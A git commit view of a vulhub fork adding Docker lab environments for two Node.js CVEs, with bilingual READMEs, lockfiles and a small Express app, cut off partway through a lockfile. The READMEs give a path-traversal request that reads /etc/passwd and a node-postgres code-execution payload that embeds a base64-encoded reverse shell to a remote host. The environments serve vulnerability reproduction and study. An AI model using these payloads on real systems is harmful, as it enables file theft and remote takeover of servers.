aaronxu/vulhub
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Details
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Details
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Details
Vulhub Docker Image CI / images-test (push) Has been cancelled
Details

Browse Source
This commit is contained in:
Aaron
2025-09-06 16:08:15 +08:00
commit 63285f61aa
2624 changed files with 88491 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

BIN
node/CVE-2017-14849/1.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 71 KiB

13
node/CVE-2017-14849/Dockerfile Normal file
View File

@@ -0,0 +1,13 @@
FROM vulhub/node:8.5.0
LABEL maintainer="phithon <root@leavesongs.com>"
COPY package.json package-lock.json /usr/src/
RUN set -ex \
&& cd /usr/src \
&& npm install
WORKDIR /usr/src
CMD ["npm", "run", "start"]

44
node/CVE-2017-14849/README.md Normal file
View File

@@ -0,0 +1,44 @@
# Node.js 8.5.0 Path Traversal (CVE-2017-14849)
[中文版本(Chinese version)](README.zh-cn.md)
Node.js is a cross-platform, open-source JavaScript runtime environment. Node.js 8.5.0 before 8.6.0 allows remote attackers to access unintended files, because a change to ".." handling was incompatible with the pathname validation used by unspecified community modules.
The vulnerability exists due to a logic error in Node.js 8.5.0's `normalize` function when handling directory paths. When traversing up directories (e.g., `../../../../../../etc/passwd`), adding `foo/../` in the middle of the path (e.g., `../../../foo/../../../../etc/passwd`) causes `normalize` to incorrectly return `/etc/passwd`, when the correct result should be `../../../../../../etc/passwd`.
Web frameworks like Express typically provide static file server functionality that relies on the `normalize` function. For example, Express uses the `normalize` function to check if a path exceeds the static directory boundaries. The above bug causes the `normalize` function to return incorrect results, bypassing these checks and leading to arbitrary file read vulnerabilities.
While the `normalize` bug could potentially affect more than just Express and requires further investigation, its impact is limited since the bug was introduced in Node.js 8.5.0 and was fixed in version 8.6.
Reference links:
- https://nodejs.org/en/blog/vulnerability/september-2017-path-validation/
- https://security.tencent.com/index.php/blog/msg/121
## Environment Setup
Run following commands to build and run a vulnerable application based on the Node.JS 8.5.0 and Express 4.15.5:
```
docker compose build
docker compose up -d
```
Visit `http://your-ip:3000/` to see a web page that references the file `/static/main.js`, indicating the presence of a static file server.
## Vulnerability Reproduce
Send the following request to read the passwd file:
```
GET /static/../../../a/../../../../etc/passwd HTTP/1.1
Host: your-ip:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
```
![](1.png)

42
node/CVE-2017-14849/README.zh-cn.md Normal file
View File

@@ -0,0 +1,42 @@
# Node.js 8.5.0 目录穿越漏洞CVE-2017-14849
Node.js 是一个跨平台的开源 JavaScript 运行环境。Node.js 8.5.0 ~ 8.6.0 版本中,由于对“..”处理方式的更改与社区模块使用的路径名验证不兼容,远程攻击者可以访问到非预期以外的文件。
这个漏洞的原因是 Node.js 8.5.0 对目录进行`normalize`操作时出现了逻辑错误,导致向上层跳跃的时候(如`../../../../../../etc/passwd`),在中间位置增加`foo/../`(如`../../../foo/../../../../etc/passwd`),即可使`normalize`返回`/etc/passwd`,但实际上正确结果应该是`../../../../../../etc/passwd`
Express这类web框架通常会提供了静态文件服务器的功能这些功能依赖于`normalize`函数。比如Express在判断path是否超出静态目录范围时就用到了`normalize`函数上述BUG导致`normalize`函数返回错误结果导致绕过了检查,造成任意文件读取漏洞。
当然,`normalize`的BUG可以影响的绝非仅有Express更有待深入挖掘。不过因为这个BUG是node 8.5.0 中引入的,在 8.6 中就进行了修复,所以影响范围有限。
参考文档:
- https://nodejs.org/en/blog/vulnerability/september-2017-path-validation/
- https://security.tencent.com/index.php/blog/msg/121
## 漏洞环境
执行如下命令编译及运行一个基于Node.js 8.5.0和Express 4.15.5的漏洞环境:
```
docker compose build
docker compose up -d
```
访问`http://your-ip:3000/`即可查看到一个web页面其中引用到了文件`/static/main.js`,说明其存在静态文件服务器。
## 漏洞复现
发送如下数据包即可读取passwd文件
```
GET /static/../../../a/../../../../etc/passwd HTTP/1.1
Host: your-ip:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
```
![](1.png)

7
node/CVE-2017-14849/docker-compose.yml Normal file
View File

@@ -0,0 +1,7 @@
services:
node:
build: .
volumes:
- ./www:/usr/src/www
ports:
- "3000:3000"

303
node/CVE-2017-14849/package-lock.json generated Normal file
View File

@@ -0,0 +1,303 @@
{
"requires": true,
"lockfileVersion": 1,
"dependencies": {
"accepts": {
"version": "1.3.4",
"resolved": "https://registry.npmjs.org/accepts/-/accepts-1.3.4.tgz",
"integrity": "sha1-hiRnWMfdbSGmR0/whKR0DsBesh8=",
"requires": {
"mime-types": "2.1.17",
"negotiator": "0.6.1"
}
},
"array-flatten": {
"version": "1.1.1",
"resolved": "https://registry.npmjs.org/array-flatten/-/array-flatten-1.1.1.tgz",
"integrity": "sha1-ml9pkFGx5wczKPKgCJaLZOopVdI="
},
"content-disposition": {
"version": "0.5.2",
"resolved": "https://registry.npmjs.org/content-disposition/-/content-disposition-0.5.2.tgz",
"integrity": "sha1-DPaLud318r55YcOoUXjLhdunjLQ="
},
"content-type": {
"version": "1.0.4",
"resolved": "https://registry.npmjs.org/content-type/-/content-type-1.0.4.tgz",
"integrity": "sha512-hIP3EEPs8tB9AT1L+NUqtwOAps4mk2Zob89MWXMHjHWg9milF/j4osnnQLXBCBFBk/tvIG/tUc9mOUJiPBhPXA=="
},
"cookie": {
"version": "0.3.1",
"resolved": "https://registry.npmjs.org/cookie/-/cookie-0.3.1.tgz",
"integrity": "sha1-5+Ch+e9DtMi6klxcWpboBtFoc7s="
},
"cookie-signature": {
"version": "1.0.6",
"resolved": "https://registry.npmjs.org/cookie-signature/-/cookie-signature-1.0.6.tgz",
"integrity": "sha1-4wOogrNCzD7oylE6eZmXNNqzriw="
},
"debug": {
"version": "2.6.9",
"resolved": "https://registry.npmjs.org/debug/-/debug-2.6.9.tgz",
"integrity": "sha512-bC7ElrdJaJnPbAP+1EotYvqZsb3ecl5wi6Bfi6BJTUcNowp6cvspg0jXznRTKDjm/E7AdgFBVeAPVMNcKGsHMA==",
"requires": {
"ms": "2.0.0"
}
},
"depd": {
"version": "1.1.1",
"resolved": "https://registry.npmjs.org/depd/-/depd-1.1.1.tgz",
"integrity": "sha1-V4O04cRZ8G+lyif5kfPQbnoxA1k="
},
"destroy": {
"version": "1.0.4",
"resolved": "https://registry.npmjs.org/destroy/-/destroy-1.0.4.tgz",
"integrity": "sha1-l4hXRCxEdJ5CBmE+N5RiBYJqvYA="
},
"ee-first": {
"version": "1.1.1",
"resolved": "https://registry.npmjs.org/ee-first/-/ee-first-1.1.1.tgz",
"integrity": "sha1-WQxhFWsK4vTwJVcyoViyZrxWsh0="
},
"encodeurl": {
"version": "1.0.1",
"resolved": "https://registry.npmjs.org/encodeurl/-/encodeurl-1.0.1.tgz",
"integrity": "sha1-eePVhlU0aQn+bw9Fpd5oEDspTSA="
},
"escape-html": {
"version": "1.0.3",
"resolved": "https://registry.npmjs.org/escape-html/-/escape-html-1.0.3.tgz",
"integrity": "sha1-Aljq5NPQwJdN4cFpGI7wBR0dGYg="
},
"etag": {
"version": "1.8.1",
"resolved": "https://registry.npmjs.org/etag/-/etag-1.8.1.tgz",
"integrity": "sha1-Qa4u62XvpiJorr/qg6x9eSmbCIc="
},
"express": {
"version": "4.15.5",
"resolved": "https://registry.npmjs.org/express/-/express-4.15.5.tgz",
"integrity": "sha1-ZwI1ypWYiQpa6BcLg9tyK4Qu2Sc=",
"requires": {
"accepts": "1.3.4",
"array-flatten": "1.1.1",
"content-disposition": "0.5.2",
"content-type": "1.0.4",
"cookie": "0.3.1",
"cookie-signature": "1.0.6",
"debug": "2.6.9",
"depd": "1.1.1",
"encodeurl": "1.0.1",
"escape-html": "1.0.3",
"etag": "1.8.1",
"finalhandler": "1.0.6",
"fresh": "0.5.2",
"merge-descriptors": "1.0.1",
"methods": "1.1.2",
"on-finished": "2.3.0",
"parseurl": "1.3.2",
"path-to-regexp": "0.1.7",
"proxy-addr": "1.1.5",
"qs": "6.5.0",
"range-parser": "1.2.0",
"send": "0.15.6",
"serve-static": "1.12.6",
"setprototypeof": "1.0.3",
"statuses": "1.3.1",
"type-is": "1.6.15",
"utils-merge": "1.0.0",
"vary": "1.1.2"
}
},
"finalhandler": {
"version": "1.0.6",
"resolved": "https://registry.npmjs.org/finalhandler/-/finalhandler-1.0.6.tgz",
"integrity": "sha1-AHrqM9Gk0+QgF/YkhIrVjSEvgU8=",
"requires": {
"debug": "2.6.9",
"encodeurl": "1.0.1",
"escape-html": "1.0.3",
"on-finished": "2.3.0",
"parseurl": "1.3.2",
"statuses": "1.3.1",
"unpipe": "1.0.0"
}
},
"forwarded": {
"version": "0.1.2",
"resolved": "https://registry.npmjs.org/forwarded/-/forwarded-0.1.2.tgz",
"integrity": "sha1-mMI9qxF1ZXuMBXPozszZGw/xjIQ="
},
"fresh": {
"version": "0.5.2",
"resolved": "https://registry.npmjs.org/fresh/-/fresh-0.5.2.tgz",
"integrity": "sha1-PYyt2Q2XZWn6g1qx+OSyOhBWBac="
},
"http-errors": {
"version": "1.6.2",
"resolved": "https://registry.npmjs.org/http-errors/-/http-errors-1.6.2.tgz",
"integrity": "sha1-CgAsyFcHGSp+eUbO7cERVfYOxzY=",
"requires": {
"depd": "1.1.1",
"inherits": "2.0.3",
"setprototypeof": "1.0.3",
"statuses": "1.3.1"
}
},
"inherits": {
"version": "2.0.3",
"resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.3.tgz",
"integrity": "sha1-Yzwsg+PaQqUC9SRmAiSA9CCCYd4="
},
"ipaddr.js": {
"version": "1.4.0",
"resolved": "https://registry.npmjs.org/ipaddr.js/-/ipaddr.js-1.4.0.tgz",
"integrity": "sha1-KWrKh4qCGBbluF0KKFqZvP9FgvA="
},
"media-typer": {
"version": "0.3.0",
"resolved": "https://registry.npmjs.org/media-typer/-/media-typer-0.3.0.tgz",
"integrity": "sha1-hxDXrwqmJvj/+hzgAWhUUmMlV0g="
},
"merge-descriptors": {
"version": "1.0.1",
"resolved": "https://registry.npmjs.org/merge-descriptors/-/merge-descriptors-1.0.1.tgz",
"integrity": "sha1-sAqqVW3YtEVoFQ7J0blT8/kMu2E="
},
"methods": {
"version": "1.1.2",
"resolved": "https://registry.npmjs.org/methods/-/methods-1.1.2.tgz",
"integrity": "sha1-VSmk1nZUE07cxSZmVoNbD4Ua/O4="
},
"mime": {
"version": "1.3.4",
"resolved": "https://registry.npmjs.org/mime/-/mime-1.3.4.tgz",
"integrity": "sha1-EV+eO2s9rylZmDyzjxSaLUDrXVM="
},
"mime-db": {
"version": "1.30.0",
"resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.30.0.tgz",
"integrity": "sha1-dMZD2i3Z1qRTmZY0ZbJtXKfXHwE="
},
"mime-types": {
"version": "2.1.17",
"resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.17.tgz",
"integrity": "sha1-Cdejk/A+mVp5+K+Fe3Cp4KsWVXo=",
"requires": {
"mime-db": "1.30.0"
}
},
"ms": {
"version": "2.0.0",
"resolved": "https://registry.npmjs.org/ms/-/ms-2.0.0.tgz",
"integrity": "sha1-VgiurfwAvmwpAd9fmGF4jeDVl8g="
},
"negotiator": {
"version": "0.6.1",
"resolved": "https://registry.npmjs.org/negotiator/-/negotiator-0.6.1.tgz",
"integrity": "sha1-KzJxhOiZIQEXeyhWP7XnECrNDKk="
},
"on-finished": {
"version": "2.3.0",
"resolved": "https://registry.npmjs.org/on-finished/-/on-finished-2.3.0.tgz",
"integrity": "sha1-IPEzZIGwg811M3mSoWlxqi2QaUc=",
"requires": {
"ee-first": "1.1.1"
}
},
"parseurl": {
"version": "1.3.2",
"resolved": "https://registry.npmjs.org/parseurl/-/parseurl-1.3.2.tgz",
"integrity": "sha1-/CidTtiZMRlGDBViUyYs3I3mW/M="
},
"path-to-regexp": {
"version": "0.1.7",
"resolved": "https://registry.npmjs.org/path-to-regexp/-/path-to-regexp-0.1.7.tgz",
"integrity": "sha1-32BBeABfUi8V60SQ5yR6G/qmf4w="
},
"proxy-addr": {
"version": "1.1.5",
"resolved": "https://registry.npmjs.org/proxy-addr/-/proxy-addr-1.1.5.tgz",
"integrity": "sha1-ccDuOxAt4/IC87ZPYI0XP8uhqRg=",
"requires": {
"forwarded": "0.1.2",
"ipaddr.js": "1.4.0"
}
},
"qs": {
"version": "6.5.0",
"resolved": "https://registry.npmjs.org/qs/-/qs-6.5.0.tgz",
"integrity": "sha512-fjVFjW9yhqMhVGwRExCXLhJKrLlkYSaxNWdyc9rmHlrVZbk35YHH312dFd7191uQeXkI3mKLZTIbSvIeFwFemg=="
},
"range-parser": {
"version": "1.2.0",
"resolved": "https://registry.npmjs.org/range-parser/-/range-parser-1.2.0.tgz",
"integrity": "sha1-9JvmtIeJTdxA3MlKMi9hEJLgDV4="
},
"send": {
"version": "0.15.6",
"resolved": "https://registry.npmjs.org/send/-/send-0.15.6.tgz",
"integrity": "sha1-IPI6nJJbdiq4JwX+L52yUqzkfjQ=",
"requires": {
"debug": "2.6.9",
"depd": "1.1.1",
"destroy": "1.0.4",
"encodeurl": "1.0.1",
"escape-html": "1.0.3",
"etag": "1.8.1",
"fresh": "0.5.2",
"http-errors": "1.6.2",
"mime": "1.3.4",
"ms": "2.0.0",
"on-finished": "2.3.0",
"range-parser": "1.2.0",
"statuses": "1.3.1"
}
},
"serve-static": {
"version": "1.12.6",
"resolved": "https://registry.npmjs.org/serve-static/-/serve-static-1.12.6.tgz",
"integrity": "sha1-uXN3P2NEmTTaVOW+ul4x2fQhFXc=",
"requires": {
"encodeurl": "1.0.1",
"escape-html": "1.0.3",
"parseurl": "1.3.2",
"send": "0.15.6"
}
},
"setprototypeof": {
"version": "1.0.3",
"resolved": "https://registry.npmjs.org/setprototypeof/-/setprototypeof-1.0.3.tgz",
"integrity": "sha1-ZlZ+NwQ+608E2RvWWMDL77VbjgQ="
},
"statuses": {
"version": "1.3.1",
"resolved": "https://registry.npmjs.org/statuses/-/statuses-1.3.1.tgz",
"integrity": "sha1-+vUbnrdKrvOzrPStX2Gr8ky3uT4="
},
"type-is": {
"version": "1.6.15",
"resolved": "https://registry.npmjs.org/type-is/-/type-is-1.6.15.tgz",
"integrity": "sha1-yrEPtJCeRByChC6v4a1kbIGARBA=",
"requires": {
"media-typer": "0.3.0",
"mime-types": "2.1.17"
}
},
"unpipe": {
"version": "1.0.0",
"resolved": "https://registry.npmjs.org/unpipe/-/unpipe-1.0.0.tgz",
"integrity": "sha1-sr9O6FFKrmFltIF4KdIbLvSZBOw="
},
"utils-merge": {
"version": "1.0.0",
"resolved": "https://registry.npmjs.org/utils-merge/-/utils-merge-1.0.0.tgz",
"integrity": "sha1-ApT7kiu5N1FTVBxPcJYjHyh8ivg="
},
"vary": {
"version": "1.1.2",
"resolved": "https://registry.npmjs.org/vary/-/vary-1.1.2.tgz",
"integrity": "sha1-IpnwLG3tMNSllhsLn3RSShj2NPw="
}
}
}

16
node/CVE-2017-14849/package.json Normal file
View File

@@ -0,0 +1,16 @@
{
"name": "cve-2017-14849",
"version": "1.0.0",
"description": "",
"main": "index.js",
"dependencies": {
"express": "4.15.5"
},
"devDependencies": {},
"scripts": {
"start": "cd www && node app.js",
"test": "echo \"Error: no test specified\" && exit 1"
},
"author": "phith0n",
"license": "MIT"
}

24
node/CVE-2017-14849/www/app.js Normal file
View File

@@ -0,0 +1,24 @@
const express = require('express')
const app = express()
const path = require('path')
app.get('/', (req, res) => {
res.send(`<html>
<head>
<meta charset="utf-8">
<title>Hello vulhub!</title>
</head>
<body>
<div id="app">
<input v-model="name">
<p>Hello {{ name }}</p>
</div>
<script src="//cdn.bootcss.com/vue/2.4.4/vue.min.js"></script>
<script src="/static/main.js"></script>
</body>
</html>`)
})
app.use('/static', express.static(path.join(__dirname, 'static')));
app.listen(3000, () => console.log('Example app listening on port 3000!'))

6
node/CVE-2017-14849/www/static/main.js Normal file
View File

@@ -0,0 +1,6 @@
var app = new Vue({
el: '#app',
data: {
name: 'Vulhub'
}
})

16
node/CVE-2017-16082/Dockerfile Normal file
View File

@@ -0,0 +1,16 @@
FROM vulhub/node:9.0.0
LABEL maintainer="phithon <root@leavesongs.com>"
COPY package.json package-lock.json /usr/src/
ADD https://raw.githubusercontent.com/vishnubob/wait-for-it/master/wait-for-it.sh /usr/local/bin/wait-for-it.sh
RUN set -ex \
&& cd /usr/src/ \
&& npm install \
&& chmod +x /usr/local/bin/wait-for-it.sh
WORKDIR /usr/src
CMD [ "npm", "run", "start" ]

44
node/CVE-2017-16082/README.md Normal file
View File

@@ -0,0 +1,44 @@
# Node-Postgres Remote Code Execution (CVE-2017-16082)
[中文版本(Chinese version)](README.zh-cn.md)
Node-postgres is a Node.js client for PostgreSQL. It is a popular database connector for Node.js applications.
When node-postgres processes a PostgreSQL response packet of type `Row Description`, it concatenates the field names into the code. Due to improper escaping, a specially crafted field name can escape the code's single quote restriction, leading to code execution vulnerability.
Reference links:
- https://www.leavesongs.com/PENETRATION/node-postgres-code-execution-vulnerability.html
- https://node-postgres.com/announcements#2017-08-12-code-execution-vulnerability
- https://zhuanlan.zhihu.com/p/28575189
## Environment Setup
Run the following commands to build and start a vulnerable application based on node-postgres 7.1.0:
```
docker compose build
docker compose up -d
```
After the server is successfully started, visit `http://your-ip:3000/?id=1` to view information for user with id 1. Using sqlmap, you can discover that there is an injection point here, and the database is PostgreSQL:
![](img/1.png)
## Vulnerability Reproduce
We can then assume that the node-postgres code execution vulnerability exists here. Write the command you want to execute `echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTkuMC4xLzIxIDA+JjE=|base64 -d|bash`, then split it appropriately (each segment should not exceed 64 characters) and replace it in the following payload:
```
SELECT 1 AS "\']=0;require=process.mainModule.constructor._load;/*", 2 AS "*/p=require(`child_process`);/*", 3 AS "*/p.exec(`echo YmFzaCAtaSA+JiAvZGV2L3Rj`+/*", 4 AS "*/`cC8xNzIuMTkuMC4xLzIxIDA+JjE=|base64 -d|bash`)//"
```
Send the above payload after encoding:
![](img/2.png)
Successfully execute commands, such as reverse shell:
![](img/3.png)
Because there are many difficulties in the reproduction process, if you encounter errors during payload generation and testing, please read [this article](https://www.leavesongs.com/PENETRATION/node-postgres-code-execution-vulnerability.html) to understand the underlying principles and find the source of the problem.

42
node/CVE-2017-16082/README.zh-cn.md Normal file
View File

@@ -0,0 +1,42 @@
# node-postgres 代码执行漏洞CVE-2017-16082
## 漏洞原理
node-postgres在处理类型为`Row Description`的postgres返回包时将字段名拼接到代码中。由于没有进行合理转义导致一个特殊构造的字段名可逃逸出代码单引号限制造成代码执行漏洞。
参考链接:
- https://www.leavesongs.com/PENETRATION/node-postgres-code-execution-vulnerability.html
- https://node-postgres.com/announcements#2017-08-12-code-execution-vulnerability
- https://zhuanlan.zhihu.com/p/28575189
## 漏洞环境
执行如下命令编译及运行一个基于node-postgres 7.1.0的漏洞环境:
```
docker compose build
docker compose up -d
```
成功运行后,访问`http://your-ip:3000/?id=1`即可查看到id为1的用户信息用sqlmap即可发现此处存在注入点且数据库为postgres
![](img/1.png)
## 漏洞复现
那么我们就可以猜测这里存在node-postgres的代码执行漏洞。编写我想执行的命令`echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTkuMC4xLzIxIDA+JjE=|base64 -d|bash`然后适当分割每段长度不超过64字符后替换在如下payload中
```
SELECT 1 AS "\']=0;require=process.mainModule.constructor._load;/*", 2 AS "*/p=require(`child_process`);/*", 3 AS "*/p.exec(`echo YmFzaCAtaSA+JiAvZGV2L3Rj`+/*", 4 AS "*/`cC8xNzIuMTkuMC4xLzIxIDA+JjE=|base64 -d|bash`)//"
```
将上述payload编码后发送
![](img/2.png)
成功执行命令如反弹shell
![](img/3.png)
因为复现过程中坑比较多payload生成与测试过程中如果出现错误还请多多阅读[我的这篇文章](https://www.leavesongs.com/PENETRATION/node-postgres-code-execution-vulnerability.html),从原理上找到问题所在。

28
node/CVE-2017-16082/db.sql Normal file
View File

@@ -0,0 +1,28 @@
-- ----------------------------
-- Table structure for user
-- ----------------------------
DROP TABLE IF EXISTS "public"."user";
CREATE TABLE "public"."user" (
"id" int4 NOT NULL,
"name" varchar(255) COLLATE "default" NOT NULL,
"score" int4 DEFAULT 0
)
WITH (OIDS=FALSE)
;
-- ----------------------------
-- Records of user
-- ----------------------------
INSERT INTO "public"."user" VALUES ('1', 'zhang', '50');
INSERT INTO "public"."user" VALUES ('2', 'wang', '90');
INSERT INTO "public"."user" VALUES ('3', 'hu', '68');
-- ----------------------------
-- Alter Sequences Owned By
-- ----------------------------
-- ----------------------------
-- Primary Key structure for table user
-- ----------------------------
ALTER TABLE "public"."user" ADD PRIMARY KEY ("id");

16
node/CVE-2017-16082/docker-compose.yml Normal file
View File

@@ -0,0 +1,16 @@
services:
node:
build: .
depends_on:
- db
ports:
- "3000:3000"
volumes:
- ./www:/usr/src/www
db:
image: postgres:9.6
environment:
- POSTGRES_PASSWORD=postgres
- POSTGRES_DB=example
volumes:
- ./db.sql:/docker-entrypoint-initdb.d/db.sql

BIN
node/CVE-2017-16082/img/1.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 42 KiB

BIN
node/CVE-2017-16082/img/2.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 36 KiB

BIN
node/CVE-2017-16082/img/3.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 11 KiB

358
node/CVE-2017-16082/package-lock.json generated Normal file
View File

@@ -0,0 +1,358 @@
{
"name": "node_postgres_example",
"version": "1.0.0",
"lockfileVersion": 1,
"requires": true,
"dependencies": {
"accepts": {
"version": "1.3.4",
"resolved": "https://registry.npmjs.org/accepts/-/accepts-1.3.4.tgz",
"integrity": "sha1-hiRnWMfdbSGmR0/whKR0DsBesh8=",
"requires": {
"mime-types": "2.1.17",
"negotiator": "0.6.1"
}
},
"any-promise": {
"version": "1.3.0",
"resolved": "https://registry.npmjs.org/any-promise/-/any-promise-1.3.0.tgz",
"integrity": "sha1-q8av7tzqUugJzcA3au0845Y10X8="
},
"buffer-writer": {
"version": "1.0.1",
"resolved": "https://registry.npmjs.org/buffer-writer/-/buffer-writer-1.0.1.tgz",
"integrity": "sha1-Iqk2kB4wKa/NdUfrRIfOtpejvwg="
},
"co": {
"version": "4.6.0",
"resolved": "https://registry.npmjs.org/co/-/co-4.6.0.tgz",
"integrity": "sha1-bqa989hTrlTMuOR7+gvz+QMfsYQ="
},
"content-disposition": {
"version": "0.5.2",
"resolved": "https://registry.npmjs.org/content-disposition/-/content-disposition-0.5.2.tgz",
"integrity": "sha1-DPaLud318r55YcOoUXjLhdunjLQ="
},
"content-type": {
"version": "1.0.4",
"resolved": "https://registry.npmjs.org/content-type/-/content-type-1.0.4.tgz",
"integrity": "sha512-hIP3EEPs8tB9AT1L+NUqtwOAps4mk2Zob89MWXMHjHWg9milF/j4osnnQLXBCBFBk/tvIG/tUc9mOUJiPBhPXA=="
},
"cookies": {
"version": "0.7.1",
"resolved": "https://registry.npmjs.org/cookies/-/cookies-0.7.1.tgz",
"integrity": "sha1-fIphX1SBxhq58WyDNzG8uPZjuZs=",
"requires": {
"depd": "1.1.1",
"keygrip": "1.0.2"
}
},
"debug": {
"version": "3.1.0",
"resolved": "https://registry.npmjs.org/debug/-/debug-3.1.0.tgz",
"integrity": "sha512-OX8XqP7/1a9cqkxYw2yXss15f26NKWBpDXQd0/uK/KPqdQhxbPa994hnzjcE2VqQpDslf55723cKPUOGSmMY3g==",
"requires": {
"ms": "2.0.0"
}
},
"deep-equal": {
"version": "1.0.1",
"resolved": "https://registry.npmjs.org/deep-equal/-/deep-equal-1.0.1.tgz",
"integrity": "sha1-9dJgKStmDghO/0zbyfCK0yR0SLU="
},
"delegates": {
"version": "1.0.0",
"resolved": "https://registry.npmjs.org/delegates/-/delegates-1.0.0.tgz",
"integrity": "sha1-hMbhWbgZBP3KWaDvRM2HDTElD5o="
},
"depd": {
"version": "1.1.1",
"resolved": "https://registry.npmjs.org/depd/-/depd-1.1.1.tgz",
"integrity": "sha1-V4O04cRZ8G+lyif5kfPQbnoxA1k="
},
"destroy": {
"version": "1.0.4",
"resolved": "https://registry.npmjs.org/destroy/-/destroy-1.0.4.tgz",
"integrity": "sha1-l4hXRCxEdJ5CBmE+N5RiBYJqvYA="
},
"ee-first": {
"version": "1.1.1",
"resolved": "https://registry.npmjs.org/ee-first/-/ee-first-1.1.1.tgz",
"integrity": "sha1-WQxhFWsK4vTwJVcyoViyZrxWsh0="
},
"error-inject": {
"version": "1.0.0",
"resolved": "https://registry.npmjs.org/error-inject/-/error-inject-1.0.0.tgz",
"integrity": "sha1-4rPZG1Su1nLzCdlQ0VSFD6EdTzc="
},
"escape-html": {
"version": "1.0.3",
"resolved": "https://registry.npmjs.org/escape-html/-/escape-html-1.0.3.tgz",
"integrity": "sha1-Aljq5NPQwJdN4cFpGI7wBR0dGYg="
},
"fresh": {
"version": "0.5.2",
"resolved": "https://registry.npmjs.org/fresh/-/fresh-0.5.2.tgz",
"integrity": "sha1-PYyt2Q2XZWn6g1qx+OSyOhBWBac="
},
"http-assert": {
"version": "1.3.0",
"resolved": "https://registry.npmjs.org/http-assert/-/http-assert-1.3.0.tgz",
"integrity": "sha1-oxpc+IyHPsu1eWkH1NbxMujAHko=",
"requires": {
"deep-equal": "1.0.1",
"http-errors": "1.6.2"
}
},
"http-errors": {
"version": "1.6.2",
"resolved": "https://registry.npmjs.org/http-errors/-/http-errors-1.6.2.tgz",
"integrity": "sha1-CgAsyFcHGSp+eUbO7cERVfYOxzY=",
"requires": {
"depd": "1.1.1",
"inherits": "2.0.3",
"setprototypeof": "1.0.3",
"statuses": "1.4.0"
}
},
"inherits": {
"version": "2.0.3",
"resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.3.tgz",
"integrity": "sha1-Yzwsg+PaQqUC9SRmAiSA9CCCYd4="
},
"is-generator-function": {
"version": "1.0.6",
"resolved": "https://registry.npmjs.org/is-generator-function/-/is-generator-function-1.0.6.tgz",
"integrity": "sha1-nnFlPNFf/zQcecQVFGChMdMen8Q="
},
"keygrip": {
"version": "1.0.2",
"resolved": "https://registry.npmjs.org/keygrip/-/keygrip-1.0.2.tgz",
"integrity": "sha1-rTKXxVcGneqLz+ek+kkbdcXd65E="
},
"koa": {
"version": "2.3.0",
"resolved": "https://registry.npmjs.org/koa/-/koa-2.3.0.tgz",
"integrity": "sha1-nh6OTaQBg5xXuFJ+rcV/dhJ1Vac=",
"requires": {
"accepts": "1.3.4",
"content-disposition": "0.5.2",
"content-type": "1.0.4",
"cookies": "0.7.1",
"debug": "3.1.0",
"delegates": "1.0.0",
"depd": "1.1.1",
"destroy": "1.0.4",
"error-inject": "1.0.0",
"escape-html": "1.0.3",
"fresh": "0.5.2",
"http-assert": "1.3.0",
"http-errors": "1.6.2",
"is-generator-function": "1.0.6",
"koa-compose": "4.0.0",
"koa-convert": "1.2.0",
"koa-is-json": "1.0.0",
"mime-types": "2.1.17",
"on-finished": "2.3.0",
"only": "0.0.2",
"parseurl": "1.3.2",
"statuses": "1.4.0",
"type-is": "1.6.15",
"vary": "1.1.2"
}
},
"koa-compose": {
"version": "4.0.0",
"resolved": "https://registry.npmjs.org/koa-compose/-/koa-compose-4.0.0.tgz",
"integrity": "sha1-KAClE9nDYe8NY4UrA45Pby1adzw="
},
"koa-convert": {
"version": "1.2.0",
"resolved": "https://registry.npmjs.org/koa-convert/-/koa-convert-1.2.0.tgz",
"integrity": "sha1-2kCHXfSd4FOQmNFwC1CCDOvNIdA=",
"requires": {
"co": "4.6.0",
"koa-compose": "3.2.1"
},
"dependencies": {
"koa-compose": {
"version": "3.2.1",
"resolved": "https://registry.npmjs.org/koa-compose/-/koa-compose-3.2.1.tgz",
"integrity": "sha1-qFzLQLfZhtjlo0Wzoazo6rz1Tec=",
"requires": {
"any-promise": "1.3.0"
}
}
}
},
"koa-is-json": {
"version": "1.0.0",
"resolved": "https://registry.npmjs.org/koa-is-json/-/koa-is-json-1.0.0.tgz",
"integrity": "sha1-JzwH7c3Ljfaiwat9We52SRRR7BQ="
},
"media-typer": {
"version": "0.3.0",
"resolved": "https://registry.npmjs.org/media-typer/-/media-typer-0.3.0.tgz",
"integrity": "sha1-hxDXrwqmJvj/+hzgAWhUUmMlV0g="
},
"mime-db": {
"version": "1.30.0",
"resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.30.0.tgz",
"integrity": "sha1-dMZD2i3Z1qRTmZY0ZbJtXKfXHwE="
},
"mime-types": {
"version": "2.1.17",
"resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.17.tgz",
"integrity": "sha1-Cdejk/A+mVp5+K+Fe3Cp4KsWVXo=",
"requires": {
"mime-db": "1.30.0"
}
},
"ms": {
"version": "2.0.0",
"resolved": "https://registry.npmjs.org/ms/-/ms-2.0.0.tgz",
"integrity": "sha1-VgiurfwAvmwpAd9fmGF4jeDVl8g="
},
"negotiator": {
"version": "0.6.1",
"resolved": "https://registry.npmjs.org/negotiator/-/negotiator-0.6.1.tgz",
"integrity": "sha1-KzJxhOiZIQEXeyhWP7XnECrNDKk="
},
"on-finished": {
"version": "2.3.0",
"resolved": "https://registry.npmjs.org/on-finished/-/on-finished-2.3.0.tgz",
